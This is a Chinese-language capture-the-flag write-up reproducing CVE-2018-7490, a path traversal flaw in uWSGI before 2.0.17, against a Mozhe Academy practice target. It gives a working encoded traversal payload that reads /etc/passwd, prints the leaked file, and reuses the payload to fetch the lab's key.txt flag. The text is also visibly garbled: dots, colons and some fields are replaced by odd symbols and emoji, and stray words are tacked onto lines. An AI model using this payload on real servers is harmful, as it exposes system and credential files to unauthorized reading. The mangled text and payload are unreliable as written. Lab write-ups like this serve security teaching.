【墨者學院】uWSGI 漏洞復現（CVE-2018-7490）

時間 2019-11-11

原文原文鏈接

0x00前言

… 表示上一級目錄
%2f是url編碼的/php

0x01 漏洞詳情

uWSGI是一款Web應用程序服務器，它實現了WSGI、uwsgi和http等協議。 uWSGI 2.0.17以前版本中存在路徑遍歷漏洞，該漏洞源於程序沒有正確的處理DOCUMENT_ROOT檢測。攻擊者可經過發送帶有‘…’序列的特製URL請求利用該漏洞查看系統上的任意文件。
uWSGI 2.0.17以前版本中存在路徑遍歷漏洞，該漏洞源於程序沒有正確的處理DOCUMENT_ROOT檢測。攻擊者可經過發送帶有‘…’序列的特製URL請求利用該漏洞查看系統上的任意文件。訪問地址存在使用信息，存在uwsgi/php，可是沒找到顯示版本的地址，就盲試、

https://www.exploit-db.com/exploits/44223web

經過phpinfo發現是使用uWSGI,就可能存在任意文件讀取漏洞。
bash

0x0 墨者學院靶子地址

地址

2.payload ：服務器

An attacker could exploit this vulnerability by using path traversal sequences ("…%2f") to access sensitive information as demonstrated below: http://example.runesec.com:1337/…%2f…%2f…%2f…%2f…%2f…%2f…%2fetc/passwd We noticed that when a Directory Traversal attack was performed, uWSGI was issuing the following security error: [uwsgi-fileserve] security error: /etc/passwd is not under /home/testing/webapp or a safe path
由上可知，經過…%2f 編碼進行…/ 的繞過。直接拿取payload進行測試：app

/…%2f…%2f…%2f…%2f…%2f…%2f…%2fetc/passwdwebapp

獲取：root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync games❌5:60:games:/usr/games:/usr/sbin/nologin man❌6:12👨/var/cache/man:/usr/sbin/nologin lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail❌8:8:mail:/var/mail:/usr/sbin/nologin news❌9:9:news:/var/spool/news:/usr/sbin/nologin uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy❌13:13:proxy:/bin:/usr/sbin/nologin www-data❌33:33:www-data:/var/www:/usr/sbin/nologin backup❌34:34:backup:/var/backups:/usr/sbin/nologin list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt❌100:65534::/nonexistent:/bin/falsesvg

判斷是存在漏洞的版本。
直接改寫payload ，按照提示根目錄 key.txt「/…%2f…%2f…%2f…%2f…%2f…%2f…%2fkey.txt」
3.獲取key
測試

mozhe6502bdd14eadeb443e74b29a97bui